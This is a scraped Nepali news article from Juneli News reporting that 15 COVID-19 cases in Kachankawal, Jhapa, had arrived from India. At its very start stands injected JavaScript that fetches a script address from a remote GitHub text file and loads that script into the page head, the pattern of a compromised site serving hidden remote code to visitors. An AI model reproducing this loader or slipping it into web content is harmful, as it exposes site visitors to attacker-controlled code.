;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); भारतबाट आएका थिए झापाका १५ कोरोना संक्रमित – जुनेली न्युज
मङ्लबार, असार ११, २०८२
  • होमपेज
  • भारतबाट आएका थिए झापाका १५ कोरोना संक्रमित
समाचार

भारतबाट आएका थिए झापाका १५ कोरोना संक्रमित

८ जेठ,

झापा । झापाको कचनकबल गाउँपालिकामा बिहीबार थपिएका १५ जना कोरोना संक्रमण पनि भारतबाटै नेपाल आएको पाइएको छ । भारतले मजदुर उद्धारका लागि रेस सेवा सुरु गरेपछि नेपाल छिरेका उनीहरुमा कोरोना भाइरसको संक्रमण देखिएको हो ।

जिल्ला जनस्वास्थ्य कार्यालय, झापाका फोकल पर्सन जीवन चौंलागाईँका अनुसार, उनीहरु पछिल्लो एक साताको अवधिमा नेपाल छिरेका व्यक्ति हुन् । उनीहरुलाई सीमा क्षेत्रबाट सीधै क्वारेन्टाइनमा लगेर राखिएको थियो ।

हालसम्म भारतबाट झापा आएका २५ जनामा कोरोना भाइरसको संक्रमण देखिएको छ । यसअघिका दुई संक्रमित दमक र बाह्रदशी गाउँपालिकाका एक/एक जनामा कोरोना भाइरसको संक्रमण देखिएको थियो । दुवै जना निको भएर घर फर्किसकेका छन् ।

फेसबुक प्रतिक्रियाहरु